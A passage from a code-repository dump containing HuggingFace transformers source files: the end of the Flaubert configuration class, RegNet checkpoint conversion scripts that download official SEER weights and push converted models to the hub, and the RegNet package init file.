Whether or not to use sinusoidal positional embeddings instead of absolute positional embeddings.
causal (`bool`, *optional*, defaults to `False`):
Whether or not the model should behave in a causal manner. Causal models use a triangular attention mask in
order to only attend to the left-side context instead if a bidirectional context.
asm (`bool`, *optional*, defaults to `False`):
Whether or not to use an adaptive log softmax projection layer instead of a linear layer for the prediction
layer.
n_langs (`int`, *optional*, defaults to 1):
The number of languages the model handles. Set to 1 for monolingual models.
use_lang_emb (`bool`, *optional*, defaults to `True`)
Whether to use language embeddings. Some models use additional language embeddings, see [the multilingual
models page](http://huggingface.co/transformers/multilingual.html#xlm-language-embeddings) for information
on how to use them.
max_position_embeddings (`int`, *optional*, defaults to 512):
The maximum sequence length that this model might ever be used with. Typically set this to something large
just in case (e.g., 512 or 1024 or 2048).
embed_init_std (`float`, *optional*, defaults to 2048^-0.5):
The standard deviation of the truncated_normal_initializer for initializing the embedding matrices.
init_std (`int`, *optional*, defaults to 50257):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices except the
embedding matrices.
layer_norm_eps (`float`, *optional*, defaults to 1e-12):
The epsilon used by the layer normalization layers.
bos_index (`int`, *optional*, defaults to 0):
The index of the beginning of sentence token in the vocabulary.
eos_index (`int`, *optional*, defaults to 1):
The index of the end of sentence token in the vocabulary.
pad_index (`int`, *optional*, defaults to 2):
The index of the padding token in the vocabulary.
unk_index (`int`, *optional*, defaults to 3):
The index of the unknown token in the vocabulary.
mask_index (`int`, *optional*, defaults to 5):
The index of the masking token in the vocabulary.
is_encoder(`bool`, *optional*, defaults to `True`):
Whether or not the initialized model should be a transformer encoder or decoder as seen in Vaswani et al.
summary_type (`string`, *optional*, defaults to "first"):
Argument used when doing sequence summary. Used in the sequence classification and multiple choice models.
Has to be one of the following options:
- `"last"`: Take the last token hidden state (like XLNet).
- `"first"`: Take the first token hidden state (like BERT).
- `"mean"`: Take the mean of all tokens hidden states.
- `"cls_index"`: Supply a Tensor of classification token position (like GPT/GPT-2).
- `"attn"`: Not implemented now, use multi-head attention.
summary_use_proj (`bool`, *optional*, defaults to `True`):
Argument used when doing sequence summary. Used in the sequence classification and multiple choice models.
Whether or not to add a projection after the vector extraction.
summary_activation (`str`, *optional*):
Argument used when doing sequence summary. Used in the sequence classification and multiple choice models.
Pass `"tanh"` for a tanh activation to the output, any other value will result in no activation.
summary_proj_to_labels (`bool`, *optional*, defaults to `True`):
Used in the sequence classification and multiple choice models.
Whether the projection outputs should have `config.num_labels` or `config.hidden_size` classes.
summary_first_dropout (`float`, *optional*, defaults to 0.1):
Used in the sequence classification and multiple choice models.
The dropout ratio to be used after the projection and activation.
start_n_top (`int`, *optional*, defaults to 5):
Used in the SQuAD evaluation script.
end_n_top (`int`, *optional*, defaults to 5):
Used in the SQuAD evaluation script.
mask_token_id (`int`, *optional*, defaults to 0):
Model agnostic parameter to identify masked tokens when generating text in an MLM context.
lang_id (`int`, *optional*, defaults to 1):
The ID of the language used by the model. This parameter is used when generating text in a given language.
"""
model_type = "flaubert"
attribute_map = {
"hidden_size": "emb_dim",
"num_attention_heads": "n_heads",
"num_hidden_layers": "n_layers",
"n_words": "vocab_size", # For backward compatibility
}
def __init__(
self,
pre_norm=False,
layerdrop=0.0,
vocab_size=30145,
emb_dim=2048,
n_layers=12,
n_heads=16,
dropout=0.1,
attention_dropout=0.1,
gelu_activation=True,
sinusoidal_embeddings=False,
causal=False,
asm=False,
n_langs=1,
use_lang_emb=True,
max_position_embeddings=512,
embed_init_std=2048**-0.5,
layer_norm_eps=1e-12,
init_std=0.02,
bos_index=0,
eos_index=1,
pad_index=2,
unk_index=3,
mask_index=5,
is_encoder=True,
summary_type="first",
summary_use_proj=True,
summary_activation=None,
summary_proj_to_labels=True,
summary_first_dropout=0.1,
start_n_top=5,
end_n_top=5,
mask_token_id=0,
lang_id=0,
pad_token_id=2,
bos_token_id=0,
**kwargs,
):
"""Constructs FlaubertConfig."""
self.pre_norm = pre_norm
self.layerdrop = layerdrop
self.vocab_size = vocab_size
self.emb_dim = emb_dim
self.n_layers = n_layers
self.n_heads = n_heads
self.dropout = dropout
self.attention_dropout = attention_dropout
self.gelu_activation = gelu_activation
self.sinusoidal_embeddings = sinusoidal_embeddings
self.causal = causal
self.asm = asm
self.n_langs = n_langs
self.use_lang_emb = use_lang_emb
self.layer_norm_eps = layer_norm_eps
self.bos_index = bos_index
self.eos_index = eos_index
self.pad_index = pad_index
self.unk_index = unk_index
self.mask_index = mask_index
self.is_encoder = is_encoder
self.max_position_embeddings = max_position_embeddings
self.embed_init_std = embed_init_std
self.init_std = init_std
self.summary_type = summary_type
self.summary_use_proj = summary_use_proj
self.summary_activation = summary_activation
self.summary_proj_to_labels = summary_proj_to_labels
self.summary_first_dropout = summary_first_dropout
self.start_n_top = start_n_top
self.end_n_top = end_n_top
self.mask_token_id = mask_token_id
self.lang_id = lang_id
if "n_words" in kwargs:
self.n_words = kwargs["n_words"]
super().__init__(pad_token_id=pad_token_id, bos_token_id=bos_token_id, **kwargs)
class FlaubertOnnxConfig(OnnxConfig):
@property
def inputs(self) -> Mapping[str, Mapping[int, str]]:
if self.task == "multiple-choice":
dynamic_axis = {0: "batch", 1: "choice", 2: "sequence"}
else:
dynamic_axis = {0: "batch", 1: "sequence"}
return OrderedDict(
[
("input_ids", dynamic_axis),
("attention_mask", dynamic_axis),
]
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 18,727 | src/transformers/models/regnet/convert_regnet_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert RegNet checkpoints from timm and vissl."""
import argparse
import json
from dataclasses import dataclass, field
from functools import partial
from pathlib import Path
from typing import Callable, Dict, List, Tuple
import timm
import torch
import torch.nn as nn
from classy_vision.models.regnet import RegNet, RegNetParams, RegNetY32gf, RegNetY64gf, RegNetY128gf
from huggingface_hub import cached_download, hf_hub_url
from torch import Tensor
from vissl.models.model_helpers import get_trunk_forward_outputs
from transformers import AutoFeatureExtractor, RegNetConfig, RegNetForImageClassification, RegNetModel
from transformers.utils import logging
logging.set_verbosity_info()
logger = logging.get_logger()
@dataclass
class Tracker:
module: nn.Module
traced: List[nn.Module] = field(default_factory=list)
handles: list = field(default_factory=list)
def _forward_hook(self, m, inputs: Tensor, outputs: Tensor):
has_not_submodules = len(list(m.modules())) == 1 or isinstance(m, nn.Conv2d) or isinstance(m, nn.BatchNorm2d)
if has_not_submodules:
self.traced.append(m)
def __call__(self, x: Tensor):
for m in self.module.modules():
self.handles.append(m.register_forward_hook(self._forward_hook))
self.module(x)
[x.remove() for x in self.handles]
return self
@property
def parametrized(self):
# check the len of the state_dict keys to see if we have learnable params
return list(filter(lambda x: len(list(x.state_dict().keys())) > 0, self.traced))
@dataclass
class ModuleTransfer:
src: nn.Module
dest: nn.Module
verbose: int = 1
src_skip: List = field(default_factory=list)
dest_skip: List = field(default_factory=list)
raise_if_mismatch: bool = True
def __call__(self, x: Tensor):
"""
Transfer the weights of `self.src` to `self.dest` by performing a forward pass using `x` as input. Under the
hood we tracked all the operations in both modules.
"""
dest_traced = Tracker(self.dest)(x).parametrized
src_traced = Tracker(self.src)(x).parametrized
src_traced = list(filter(lambda x: type(x) not in self.src_skip, src_traced))
dest_traced = list(filter(lambda x: type(x) not in self.dest_skip, dest_traced))
if len(dest_traced) != len(src_traced) and self.raise_if_mismatch:
raise Exception(
f"Numbers of operations are different. Source module has {len(src_traced)} operations while"
f" destination module has {len(dest_traced)}."
)
for dest_m, src_m in zip(dest_traced, src_traced):
dest_m.load_state_dict(src_m.state_dict())
if self.verbose == 1:
print(f"Transfered from={src_m} to={dest_m}")
class FakeRegNetVisslWrapper(nn.Module):
"""
Fake wrapper for RegNet that mimics what vissl does without the need to pass a config file.
"""
def __init__(self, model: nn.Module):
super().__init__()
feature_blocks: List[Tuple[str, nn.Module]] = []
# - get the stem
feature_blocks.append(("conv1", model.stem))
# - get all the feature blocks
for k, v in model.trunk_output.named_children():
assert k.startswith("block"), f"Unexpected layer name {k}"
block_index = len(feature_blocks) + 1
feature_blocks.append((f"res{block_index}", v))
self._feature_blocks = nn.ModuleDict(feature_blocks)
def forward(self, x: Tensor):
return get_trunk_forward_outputs(
x,
out_feat_keys=None,
feature_blocks=self._feature_blocks,
)
class NameToFromModelFuncMap(dict):
"""
A Dictionary with some additional logic to return a function that creates the correct original model.
"""
def convert_name_to_timm(self, x: str) -> str:
x_split = x.split("-")
return x_split[0] + x_split[1] + "_" + "".join(x_split[2:])
def __getitem__(self, x: str) -> Callable[[], Tuple[nn.Module, Dict]]:
# default to timm!
if x not in self:
x = self.convert_name_to_timm(x)
val = partial(lambda: (timm.create_model(x, pretrained=True).eval(), None))
else:
val = super().__getitem__(x)
return val
class NameToOurModelFuncMap(dict):
"""
A Dictionary with some additional logic to return the correct hugging face RegNet class reference.
"""
def __getitem__(self, x: str) -> Callable[[], nn.Module]:
if "seer" in x and "in1k" not in x:
val = RegNetModel
else:
val = RegNetForImageClassification
return val
def manually_copy_vissl_head(from_state_dict, to_state_dict, keys: List[Tuple[str, str]]):
for from_key, to_key in keys:
to_state_dict[to_key] = from_state_dict[from_key].clone()
print(f"Copied key={from_key} to={to_key}")
return to_state_dict
def convert_weight_and_push(
name: str,
from_model_func: Callable[[], nn.Module],
our_model_func: Callable[[], nn.Module],
config: RegNetConfig,
save_directory: Path,
push_to_hub: bool = True,
):
print(f"Converting {name}...")
with torch.no_grad():
from_model, from_state_dict = from_model_func()
our_model = our_model_func(config).eval()
module_transfer = ModuleTransfer(src=from_model, dest=our_model, raise_if_mismatch=False)
x = torch.randn((1, 3, 224, 224))
module_transfer(x)
if from_state_dict is not None:
keys = []
# for seer - in1k finetuned we have to manually copy the head
if "seer" in name and "in1k" in name:
keys = [("0.clf.0.weight", "classifier.1.weight"), ("0.clf.0.bias", "classifier.1.bias")]
to_state_dict = manually_copy_vissl_head(from_state_dict, our_model.state_dict(), keys)
our_model.load_state_dict(to_state_dict)
our_outputs = our_model(x, output_hidden_states=True)
our_output = (
our_outputs.logits if isinstance(our_model, RegNetForImageClassification) else our_outputs.last_hidden_state
)
from_output = from_model(x)
from_output = from_output[-1] if type(from_output) is list else from_output
# now since I don't want to use any config files, vissl seer model doesn't actually have an head, so let's just check the last hidden state
if "seer" in name and "in1k" in name:
our_output = our_outputs.hidden_states[-1]
assert torch.allclose(from_output, our_output), "The model logits don't match the original one."
if push_to_hub:
our_model.push_to_hub(
repo_path_or_name=save_directory / name,
commit_message="Add model",
use_temp_dir=True,
)
size = 224 if "seer" not in name else 384
# we can use the convnext one
feature_extractor = AutoFeatureExtractor.from_pretrained("facebook/convnext-base-224-22k-1k", size=size)
feature_extractor.push_to_hub(
repo_path_or_name=save_directory / name,
commit_message="Add feature extractor",
use_temp_dir=True,
)
print(f"Pushed {name}")
def convert_weights_and_push(save_directory: Path, model_name: str = None, push_to_hub: bool = True):
filename = "imagenet-1k-id2label.json"
num_labels = 1000
expected_shape = (1, num_labels)
repo_id = "huggingface/label-files"
num_labels = num_labels
id2label = json.load(open(cached_download(hf_hub_url(repo_id, filename, repo_type="dataset")), "r"))
id2label = {int(k): v for k, v in id2label.items()}
id2label = id2label
label2id = {v: k for k, v in id2label.items()}
ImageNetPreTrainedConfig = partial(RegNetConfig, num_labels=num_labels, id2label=id2label, label2id=label2id)
names_to_config = {
"regnet-x-002": ImageNetPreTrainedConfig(
depths=[1, 1, 4, 7], hidden_sizes=[24, 56, 152, 368], groups_width=8, layer_type="x"
),
"regnet-x-004": ImageNetPreTrainedConfig(
depths=[1, 2, 7, 12], hidden_sizes=[32, 64, 160, 384], groups_width=16, layer_type="x"
),
"regnet-x-006": ImageNetPreTrainedConfig(
depths=[1, 3, 5, 7], hidden_sizes=[48, 96, 240, 528], groups_width=24, layer_type="x"
),
"regnet-x-008": ImageNetPreTrainedConfig(
depths=[1, 3, 7, 5], hidden_sizes=[64, 128, 288, 672], groups_width=16, layer_type="x"
),
"regnet-x-016": ImageNetPreTrainedConfig(
depths=[2, 4, 10, 2], hidden_sizes=[72, 168, 408, 912], groups_width=24, layer_type="x"
),
"regnet-x-032": ImageNetPreTrainedConfig(
depths=[2, 6, 15, 2], hidden_sizes=[96, 192, 432, 1008], groups_width=48, layer_type="x"
),
"regnet-x-040": ImageNetPreTrainedConfig(
depths=[2, 5, 14, 2], hidden_sizes=[80, 240, 560, 1360], groups_width=40, layer_type="x"
),
"regnet-x-064": ImageNetPreTrainedConfig(
depths=[2, 4, 10, 1], hidden_sizes=[168, 392, 784, 1624], groups_width=56, layer_type="x"
),
"regnet-x-080": ImageNetPreTrainedConfig(
depths=[2, 5, 15, 1], hidden_sizes=[80, 240, 720, 1920], groups_width=120, layer_type="x"
),
"regnet-x-120": ImageNetPreTrainedConfig(
depths=[2, 5, 11, 1], hidden_sizes=[224, 448, 896, 2240], groups_width=112, layer_type="x"
),
"regnet-x-160": ImageNetPreTrainedConfig(
depths=[2, 6, 13, 1], hidden_sizes=[256, 512, 896, 2048], groups_width=128, layer_type="x"
),
"regnet-x-320": ImageNetPreTrainedConfig(
depths=[2, 7, 13, 1], hidden_sizes=[336, 672, 1344, 2520], groups_width=168, layer_type="x"
),
# y variant
"regnet-y-002": ImageNetPreTrainedConfig(depths=[1, 1, 4, 7], hidden_sizes=[24, 56, 152, 368], groups_width=8),
"regnet-y-004": ImageNetPreTrainedConfig(
depths=[1, 3, 6, 6], hidden_sizes=[48, 104, 208, 440], groups_width=8
),
"regnet-y-006": ImageNetPreTrainedConfig(
depths=[1, 3, 7, 4], hidden_sizes=[48, 112, 256, 608], groups_width=16
),
"regnet-y-008": ImageNetPreTrainedConfig(
depths=[1, 3, 8, 2], hidden_sizes=[64, 128, 320, 768], groups_width=16
),
"regnet-y-016": ImageNetPreTrainedConfig(
depths=[2, 6, 17, 2], hidden_sizes=[48, 120, 336, 888], groups_width=24
),
"regnet-y-032": ImageNetPreTrainedConfig(
depths=[2, 5, 13, 1], hidden_sizes=[72, 216, 576, 1512], groups_width=24
),
"regnet-y-040": ImageNetPreTrainedConfig(
depths=[2, 6, 12, 2], hidden_sizes=[128, 192, 512, 1088], groups_width=64
),
"regnet-y-064": ImageNetPreTrainedConfig(
depths=[2, 7, 14, 2], hidden_sizes=[144, 288, 576, 1296], groups_width=72
),
"regnet-y-080": ImageNetPreTrainedConfig(
depths=[2, 4, 10, 1], hidden_sizes=[168, 448, 896, 2016], groups_width=56
),
"regnet-y-120": ImageNetPreTrainedConfig(
depths=[2, 5, 11, 1], hidden_sizes=[224, 448, 896, 2240], groups_width=112
),
"regnet-y-160": ImageNetPreTrainedConfig(
depths=[2, 4, 11, 1], hidden_sizes=[224, 448, 1232, 3024], groups_width=112
),
"regnet-y-320": ImageNetPreTrainedConfig(
depths=[2, 5, 12, 1], hidden_sizes=[232, 696, 1392, 3712], groups_width=232
),
# models created by SEER -> https://arxiv.org/abs/2202.08360
"regnet-y-320-seer": RegNetConfig(depths=[2, 5, 12, 1], hidden_sizes=[232, 696, 1392, 3712], groups_width=232),
"regnet-y-640-seer": RegNetConfig(depths=[2, 5, 12, 1], hidden_sizes=[328, 984, 1968, 4920], groups_width=328),
"regnet-y-1280-seer": RegNetConfig(
depths=[2, 7, 17, 1], hidden_sizes=[528, 1056, 2904, 7392], groups_width=264
),
"regnet-y-2560-seer": RegNetConfig(
depths=[3, 7, 16, 1], hidden_sizes=[640, 1696, 2544, 5088], groups_width=640
),
"regnet-y-10b-seer": ImageNetPreTrainedConfig(
depths=[2, 7, 17, 1], hidden_sizes=[2020, 4040, 11110, 28280], groups_width=1010
),
# finetuned on imagenet
"regnet-y-320-seer-in1k": ImageNetPreTrainedConfig(
depths=[2, 5, 12, 1], hidden_sizes=[232, 696, 1392, 3712], groups_width=232
),
"regnet-y-640-seer-in1k": ImageNetPreTrainedConfig(
depths=[2, 5, 12, 1], hidden_sizes=[328, 984, 1968, 4920], groups_width=328
),
"regnet-y-1280-seer-in1k": ImageNetPreTrainedConfig(
depths=[2, 7, 17, 1], hidden_sizes=[528, 1056, 2904, 7392], groups_width=264
),
"regnet-y-2560-seer-in1k": ImageNetPreTrainedConfig(
depths=[3, 7, 16, 1], hidden_sizes=[640, 1696, 2544, 5088], groups_width=640
),
"regnet-y-10b-seer-in1k": ImageNetPreTrainedConfig(
depths=[2, 7, 17, 1], hidden_sizes=[2020, 4040, 11110, 28280], groups_width=1010
),
}
names_to_ours_model_map = NameToOurModelFuncMap()
names_to_from_model_map = NameToFromModelFuncMap()
# add seer weights logic
def load_using_classy_vision(checkpoint_url: str, model_func: Callable[[], nn.Module]) -> Tuple[nn.Module, Dict]:
files = torch.hub.load_state_dict_from_url(checkpoint_url, model_dir=str(save_directory), map_location="cpu")
model = model_func()
# check if we have a head, if yes add it
model_state_dict = files["classy_state_dict"]["base_model"]["model"]
state_dict = model_state_dict["trunk"]
model.load_state_dict(state_dict)
return model.eval(), model_state_dict["heads"]
# pretrained
names_to_from_model_map["regnet-y-320-seer"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet32d/seer_regnet32gf_model_iteration244000.torch",
lambda: FakeRegNetVisslWrapper(RegNetY32gf()),
)
names_to_from_model_map["regnet-y-640-seer"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet64/seer_regnet64gf_model_final_checkpoint_phase0.torch",
lambda: FakeRegNetVisslWrapper(RegNetY64gf()),
)
names_to_from_model_map["regnet-y-1280-seer"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/swav_ig1b_regnet128Gf_cnstant_bs32_node16_sinkhorn10_proto16k_syncBN64_warmup8k/model_final_checkpoint_phase0.torch",
lambda: FakeRegNetVisslWrapper(RegNetY128gf()),
)
names_to_from_model_map["regnet-y-10b-seer"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet10B/model_iteration124500_conso.torch",
lambda: FakeRegNetVisslWrapper(
RegNet(RegNetParams(depth=27, group_width=1010, w_0=1744, w_a=620.83, w_m=2.52))
),
)
# IN1K finetuned
names_to_from_model_map["regnet-y-320-seer-in1k"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet32_finetuned_in1k_model_final_checkpoint_phase78.torch",
lambda: FakeRegNetVisslWrapper(RegNetY32gf()),
)
names_to_from_model_map["regnet-y-640-seer-in1k"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet64_finetuned_in1k_model_final_checkpoint_phase78.torch",
lambda: FakeRegNetVisslWrapper(RegNetY64gf()),
)
names_to_from_model_map["regnet-y-1280-seer-in1k"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet128_finetuned_in1k_model_final_checkpoint_phase78.torch",
lambda: FakeRegNetVisslWrapper(RegNetY128gf()),
)
names_to_from_model_map["regnet-y-10b-seer-in1k"] = partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_10b_finetuned_in1k_model_phase28_conso.torch",
lambda: FakeRegNetVisslWrapper(
RegNet(RegNetParams(depth=27, group_width=1010, w_0=1744, w_a=620.83, w_m=2.52))
),
)
if model_name:
convert_weight_and_push(
model_name,
names_to_from_model_map[model_name],
names_to_ours_model_map[model_name],
names_to_config[model_name],
save_directory,
push_to_hub,
)
else:
for model_name, config in names_to_config.items():
convert_weight_and_push(
model_name,
names_to_from_model_map[model_name],
names_to_ours_model_map[model_name],
config,
save_directory,
push_to_hub,
)
return config, expected_shape
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--model_name",
default=None,
type=str,
help=(
"The name of the model you wish to convert, it must be one of the supported regnet* architecture,"
" currently: regnetx-*, regnety-*. If `None`, all of them will the converted."
),
)
parser.add_argument(
"--pytorch_dump_folder_path",
default=None,
type=Path,
required=True,
help="Path to the output PyTorch model directory.",
)
parser.add_argument(
"--push_to_hub",
default=True,
type=bool,
required=False,
help="If True, push model and feature extractor to the hub.",
)
args = parser.parse_args()
pytorch_dump_folder_path: Path = args.pytorch_dump_folder_path
pytorch_dump_folder_path.mkdir(exist_ok=True, parents=True)
convert_weights_and_push(pytorch_dump_folder_path, args.model_name, args.push_to_hub)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,490 | src/transformers/models/regnet/__init__.py | # Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_tf_available, is_torch_available
_import_structure = {"configuration_regnet": ["REGNET_PRETRAINED_CONFIG_ARCHIVE_MAP", "RegNetConfig"]}
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_regnet"] = [
"REGNET_PRETRAINED_MODEL_ARCHIVE_LIST",
"RegNetForImageClassification",
"RegNetModel",
"RegNetPreTrainedModel",
]
try:
if not is_tf_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_tf_regnet"] = [
"TF_REGNET_PRETRAINED_MODEL_ARCHIVE_LIST",
"TFRegNetForImageClassification",
"TFRegNetModel",
"TFRegNetPreTrainedModel",
]
if TYPE_CHECKING:
from .configuration_regnet import REGNET_PRETRAINED_CONFIG_ARCHIVE_MAP, RegNetConfig
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_regnet import (
REGNET_PRETRAINED_MODEL_ARCHIVE_LIST,
RegNetForImageClassification,
RegNetModel,
RegNetPreTrainedModel,
)
try:
if not is_tf_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_tf_regnet import (
TF_REGNET_PRETRAINED_MODEL_ARCHIVE_LIST,
TFRegNetForImageClassification,
TFRegNetModel,
TFRegNetPreTrainedModel,
)
else:
import sys
sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 11,782 | src/transformers/models/regnet/convert_regnet_seer_10b_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert RegNet 10B checkpoints vissl."""
# You need to install a specific version of classy vision
# pip install git+https://github.com/FrancescoSaverioZuppichini/ClassyVision.git@convert_weights
import argparse
import json
import os
import re
from collections import OrderedDict
from dataclasses import dataclass, field
from functools import partial
from pathlib import Path
from pprint import pprint
from typing import Dict, List, Tuple
import torch
import torch.nn as nn
from classy_vision.models.regnet import RegNet, RegNetParams
from huggingface_hub import cached_download, hf_hub_url
from torch import Tensor
from vissl.models.model_helpers import get_trunk_forward_outputs
from transformers import AutoFeatureExtractor, RegNetConfig, RegNetForImageClassification, RegNetModel
from transformers.modeling_utils import PreTrainedModel
from transformers.utils import logging
logging.set_verbosity_info()
logger = logging.get_logger()
@dataclass
class Tracker:
module: nn.Module
traced: List[nn.Module] = field(default_factory=list)
handles: list = field(default_factory=list)
name2module: Dict[str, nn.Module] = field(default_factory=OrderedDict)
def _forward_hook(self, m, inputs: Tensor, outputs: Tensor, name: str):
has_not_submodules = len(list(m.modules())) == 1 or isinstance(m, nn.Conv2d) or isinstance(m, nn.BatchNorm2d)
if has_not_submodules:
self.traced.append(m)
self.name2module[name] = m
def __call__(self, x: Tensor):
for name, m in self.module.named_modules():
self.handles.append(m.register_forward_hook(partial(self._forward_hook, name=name)))
self.module(x)
[x.remove() for x in self.handles]
return self
@property
def parametrized(self):
# check the len of the state_dict keys to see if we have learnable params
return {k: v for k, v in self.name2module.items() if len(list(v.state_dict().keys())) > 0}
class FakeRegNetVisslWrapper(nn.Module):
"""
Fake wrapper for RegNet that mimics what vissl does without the need to pass a config file.
"""
def __init__(self, model: nn.Module):
super().__init__()
feature_blocks: List[Tuple[str, nn.Module]] = []
# - get the stem
feature_blocks.append(("conv1", model.stem))
# - get all the feature blocks
for k, v in model.trunk_output.named_children():
assert k.startswith("block"), f"Unexpected layer name {k}"
block_index = len(feature_blocks) + 1
feature_blocks.append((f"res{block_index}", v))
self._feature_blocks = nn.ModuleDict(feature_blocks)
def forward(self, x: Tensor):
return get_trunk_forward_outputs(
x,
out_feat_keys=None,
feature_blocks=self._feature_blocks,
)
class FakeRegNetParams(RegNetParams):
"""
Used to instantiace a RegNet model from classy vision with the same depth as the 10B one but with super small
parameters, so we can trace it in memory.
"""
def get_expanded_params(self):
return [(8, 2, 2, 8, 1.0), (8, 2, 7, 8, 1.0), (8, 2, 17, 8, 1.0), (8, 2, 1, 8, 1.0)]
def get_from_to_our_keys(model_name: str) -> Dict[str, str]:
"""
Returns a dictionary that maps from original model's key -> our implementation's keys
"""
# create our model (with small weights)
our_config = RegNetConfig(depths=[2, 7, 17, 1], hidden_sizes=[8, 8, 8, 8], groups_width=8)
if "in1k" in model_name:
our_model = RegNetForImageClassification(our_config)
else:
our_model = RegNetModel(our_config)
# create from model (with small weights)
from_model = FakeRegNetVisslWrapper(
RegNet(FakeRegNetParams(depth=27, group_width=1010, w_0=1744, w_a=620.83, w_m=2.52))
)
with torch.no_grad():
from_model = from_model.eval()
our_model = our_model.eval()
x = torch.randn((1, 3, 32, 32))
# trace both
dest_tracker = Tracker(our_model)
dest_traced = dest_tracker(x).parametrized
pprint(dest_tracker.name2module)
src_tracker = Tracker(from_model)
src_traced = src_tracker(x).parametrized
# convert the keys -> module dict to keys -> params
def to_params_dict(dict_with_modules):
params_dict = OrderedDict()
for name, module in dict_with_modules.items():
for param_name, param in module.state_dict().items():
params_dict[f"{name}.{param_name}"] = param
return params_dict
from_to_ours_keys = {}
src_state_dict = to_params_dict(src_traced)
dst_state_dict = to_params_dict(dest_traced)
for (src_key, src_param), (dest_key, dest_param) in zip(src_state_dict.items(), dst_state_dict.items()):
from_to_ours_keys[src_key] = dest_key
logger.info(f"{src_key} -> {dest_key}")
# if "in1k" was in the model_name it means it must have a classification head (was finetuned)
if "in1k" in model_name:
from_to_ours_keys["0.clf.0.weight"] = "classifier.1.weight"
from_to_ours_keys["0.clf.0.bias"] = "classifier.1.bias"
return from_to_ours_keys
def convert_weights_and_push(save_directory: Path, model_name: str = None, push_to_hub: bool = True):
filename = "imagenet-1k-id2label.json"
num_labels = 1000
repo_id = "huggingface/label-files"
num_labels = num_labels
id2label = json.load(open(cached_download(hf_hub_url(repo_id, filename, repo_type="dataset")), "r"))
id2label = {int(k): v for k, v in id2label.items()}
id2label = id2label
label2id = {v: k for k, v in id2label.items()}
ImageNetPreTrainedConfig = partial(RegNetConfig, num_labels=num_labels, id2label=id2label, label2id=label2id)
names_to_config = {
"regnet-y-10b-seer": ImageNetPreTrainedConfig(
depths=[2, 7, 17, 1], hidden_sizes=[2020, 4040, 11110, 28280], groups_width=1010
),
# finetuned on imagenet
"regnet-y-10b-seer-in1k": ImageNetPreTrainedConfig(
depths=[2, 7, 17, 1], hidden_sizes=[2020, 4040, 11110, 28280], groups_width=1010
),
}
# add seer weights logic
def load_using_classy_vision(checkpoint_url: str) -> Tuple[Dict, Dict]:
files = torch.hub.load_state_dict_from_url(checkpoint_url, model_dir=str(save_directory), map_location="cpu")
# check if we have a head, if yes add it
model_state_dict = files["classy_state_dict"]["base_model"]["model"]
return model_state_dict["trunk"], model_state_dict["heads"]
names_to_from_model = {
"regnet-y-10b-seer": partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet10B/model_iteration124500_conso.torch",
),
"regnet-y-10b-seer-in1k": partial(
load_using_classy_vision,
"https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_10b_finetuned_in1k_model_phase28_conso.torch",
),
}
from_to_ours_keys = get_from_to_our_keys(model_name)
if not (save_directory / f"{model_name}.pth").exists():
logger.info("Loading original state_dict.")
from_state_dict_trunk, from_state_dict_head = names_to_from_model[model_name]()
from_state_dict = from_state_dict_trunk
if "in1k" in model_name:
# add the head
from_state_dict = {**from_state_dict_trunk, **from_state_dict_head}
logger.info("Done!")
converted_state_dict = {}
not_used_keys = list(from_state_dict.keys())
regex = r"\.block.-part."
# this is "interesting", so the original checkpoints have `block[0,1]-part` in each key name, we remove it
for key in from_state_dict.keys():
# remove the weird "block[0,1]-part" from the key
src_key = re.sub(regex, "", key)
# now src_key from the model checkpoints is the one we got from the original model after tracing, so use it to get the correct destination key
